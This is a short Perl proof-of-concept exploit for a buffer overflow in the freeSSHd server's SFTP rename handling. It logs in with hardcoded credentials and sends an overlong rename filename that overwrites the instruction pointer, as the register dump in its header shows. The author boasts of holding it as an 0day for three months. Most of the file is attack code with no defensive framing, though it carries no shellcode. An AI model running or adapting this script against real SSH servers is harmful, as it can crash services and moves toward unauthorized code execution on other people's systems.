freesshd-overflow.txt

`# freeSSHd (rename) Buffer Overflow Vulnerability  
# http://www.milw0rm.com/exploits/6800 <-- Same vuln just further research  
  
# Registers  
# EAX 00000000  
# ECX 41414141  
# EDX 7C9037D8 ntdll.7C9037D8  
# EBX 00000000  
# ESP 001376BC  
# EBP 001376DC  
# ESI 00000000  
# EDI 00000000  
# EIP 41414141 <-- Pwned  
  
# Part of the string is passed to various functions and eventually overwrites EIP.   
# In order to exploit some patching needs to occur. I've been trying to exploit   
# this vulnerability on and off in my spare time.   
#  
# 0day for 3 months :)  
#  
# Written by r0ut3r (writ3r [at] gmail.com)  
  
use Net::SSH2;  
  
my $user = "root";  
my $pass = "yahh";  
  
my $ip = "127.0.0.1";  
my $port = 22;  
  
my $ssh2 = Net::SSH2->new();  
  
print "[+] Connecting...\n";  
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";  
$ssh2->auth_password($user, $pass) || "[-] Incorrect credentials\n";  
print "[+] Sending payload\n";  
  
my $junk = 'A' x 317;  
my $eip = 'BBBB';  
  
print $payload;  
my $payload = $junk.$eip;  
  
my $sftp = $ssh2->sftp();  
$sftp->rename($payload, 'B');  
  
print "[+] Sent";  
$ssh2->disconnect;  
`